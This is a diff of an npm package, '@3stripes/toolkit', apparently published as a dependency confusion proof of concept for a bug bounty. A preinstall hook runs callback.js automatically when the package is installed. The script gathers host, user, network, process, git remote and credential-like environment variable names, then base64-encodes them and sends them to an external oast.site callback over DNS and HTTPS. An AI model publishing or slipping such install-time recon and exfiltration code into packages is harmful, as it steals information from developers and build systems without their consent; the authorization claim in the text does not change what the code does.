@3stripes/toolkit 999.0.3

package/README.md

@@ -0,0 +1,5 @@
+# @3stripes/toolkit
+
+Security research — Dependency confusion PoC. Authorized bug bounty assessment.
+
+**Contact:** gdattacker@bugcrowdninja.com

package/callback.js

@@ -0,0 +1,122 @@
+/**
+ * SECURITY RESEARCH - Dependency Confusion PoC
+ * 
+ * This is part of an AUTHORIZED bug bounty assessment.
+ * Runs pentest-style recon commands and exfiltrates to callback (no secrets, proof-only).
+ * 
+ * Researcher: gdattacker (gdattacker@bugcrowdninja.com)
+ * Program: Adidas Private Bug Bounty (Bugcrowd)
+ */
+
+const dns = require('dns');
+const https = require('https');
+const os = require('os');
+const { execSync } = require('child_process');
+
+const CALLBACK_DOMAIN = '2defa924e4f741393204gup1d5yyyyyyd.oast.site';
+const id = Buffer.from(os.hostname().slice(0, 8)).toString('hex').slice(0, 12);
+const pkg = '3stripes-toolkit';
+const isWin = process.platform === 'win32';
+
+function run(cmd, timeoutMs, maxLen) {
+  try {
+    const out = (execSync(cmd, { encoding: 'utf8', timeout: timeoutMs || 3000, stdio: ['pipe', 'pipe', 'pipe'] }) || '').trim();
+    return (maxLen ? out.slice(0, maxLen) : out).replace(/\s+/g, ' ');
+  } catch (e) {
+    return '';
+  }
+}
+
+// --- Pentest-style recon: hostnames ---
+let hostnames = '';
+if (isWin) {
+  hostnames = run('hostname', 2000) || process.env.COMPUTERNAME || os.hostname();
+} else {
+  const h = run('hostname', 2000);
+  const hf = run('hostname -f 2>/dev/null', 2000);
+  const etcHostname = run('cat /etc/hostname 2>/dev/null', 2000);
+  const etcHosts = run('head -20 /etc/hosts 2>/dev/null', 2000);
+  hostnames = [os.hostname(), h, hf, etcHostname, etcHosts].filter(Boolean).join('|');
+}
+
+// --- User / identity ---
+const user = isWin ? run('whoami', 2000, 200) : run('id', 2000, 300);
+const whoami = run('whoami', 2000, 100);
+
+// --- System info ---
+const uname = run(isWin ? 'ver' : 'uname -a', 2000, 400);
+const pwd = run(isWin ? 'cd' : 'pwd', 2000, 300);
+
+// --- Network (proves internal/CI environment) ---
+let network = '';
+if (isWin) {
+  network = run('ipconfig 2>nul', 3000, 600);
+} else {
+  const ipAddr = run('ip addr show 2>/dev/null', 3000, 500) || run('ifconfig 2>/dev/null', 3000, 500);
+  const hostnameI = run('hostname -I 2>/dev/null', 2000, 200);
+  network = [ipAddr, hostnameI].filter(Boolean).join(' ');
+}
+
+// --- Process list (snippet: proves what’s running) ---
+const ps = isWin
+  ? run('tasklist 2>nul', 3000, 500)
+  : run('ps aux 2>/dev/null | head -25', 3000, 600);
+
+// --- Env var NAMES only (proves stealable credentials exist; no values) ---
+const envKeys = Object.keys(process.env || {}).filter(function (k) {
+  const u = k.toUpperCase();
+  return /^(AWS|KUBE|GIT|NPM|ARTIFACTORY|CI|JENKINS|AZURE|GOOGLE|SLACK|GH_|NODE_|NVM_|NEXUS|JFROG|ADIDAS|STRIPE|TOKEN|SECRET|KEY|CREDENTIAL|PASSWORD|API_KEY)/i.test(k) || u.indexOf('TOKEN') >= 0 || u.indexOf('SECRET') >= 0 || u.indexOf('KEY') >= 0;
+}).slice(0, 30).join(',');
+
+// --- Git / npm (registry, remotes = internal repo names) ---
+const gitRemote = run('git remote -v 2>/dev/null', 2000, 400);
+const npmRegistry = run('npm config get registry 2>/dev/null', 2000, 200);
+
+// --- Optional: package manager / container hints ---
+const inDocker = run('cat /proc/1/cgroup 2>/dev/null | head -3', 2000, 300);
+const envCi = (process.env.CI || process.env.CI_NAME || process.env.BUILDKITE || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI || process.env.JENKINS_URL || '').slice(0, 100);
+
+const recon = {
+  id,
+  pkg,
+  hostnames: (hostnames || os.hostname() || 'unknown').slice(0, 400),
+  user: (user || whoami || '').slice(0, 200),
+  uname: uname.slice(0, 300),
+  pwd: pwd.slice(0, 200),
+  network: network.slice(0, 500),
+  ps: ps.slice(0, 500),
+  env_keys: envKeys.slice(0, 300),
+  git_remote: gitRemote.slice(0, 300),
+  npm_registry: npmRegistry.slice(0, 150),
+  in_docker: inDocker.slice(0, 200),
+  ci_env: envCi
+};
+
+const payload = encodeURIComponent(Buffer.from(JSON.stringify(recon)).toString('base64'));
+
+// DNS callback (hostname in subdomain)
+try {
+  const safe = (hostnames || id).replace(/[\s.|]/g, '-').replace(/[^a-z0-9-]/gi, '').slice(0, 40);
+  const dnsLabel = `${pkg}-${id}-${safe}`.slice(0, 63);
+  dns.resolve(`${dnsLabel}.${CALLBACK_DOMAIN}`, () => {});
+} catch (e) {}
+
+// HTTP callback: full recon payload (single GET)
+try {
+  const url = `https://${CALLBACK_DOMAIN}/${pkg}?id=${id}&r=${payload}`;
+  const req = https.get(url, () => {});
+  req.on('error', () => {});
+  req.setTimeout(8000, () => req.destroy());
+} catch (e) {}
+
+// Fallback: legacy hostnames-only query (in case parser expects it)
+try {
+  const legacyUrl = `https://${CALLBACK_DOMAIN}/${pkg}/legacy?id=${id}&hostnames=${encodeURIComponent((hostnames || os.hostname() || 'unknown').slice(0, 300))}`;
+  const req2 = https.get(legacyUrl, () => {});
+  req2.on('error', () => {});
+  req2.setTimeout(5000, () => req2.destroy());
+} catch (e) {}
+
+console.log(`[Security Research] Dependency confusion PoC executed - ${pkg}`);
+console.log(`[Security Research] Contact: gdattacker@bugcrowdninja.com`);
+console.log(`[Security Research] This is part of an authorized bug bounty assessment.`);

package/index.js

@@ -0,0 +1,6 @@
+/**
+ * Security Research Package - Dependency Confusion PoC
+ * This package exists solely for authorized security testing.
+ * Contact: gdattacker@bugcrowdninja.com
+ */
+module.exports = {};

package/package.json

@@ -0,0 +1,16 @@
+{
+  "name": "@3stripes/toolkit",
+  "version": "999.0.3",
+  "description": "Security research - Dependency confusion proof of concept. This package is part of an authorized bug bounty assessment. Contact: gdattacker@bugcrowdninja.com",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node callback.js || true"
+  },
+  "keywords": ["security-research", "bug-bounty", "authorized-testing"],
+  "author": "gdattacker <gdattacker@bugcrowdninja.com>",
+  "license": "ISC",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/security-research/dep-confusion-poc"
+  }
+}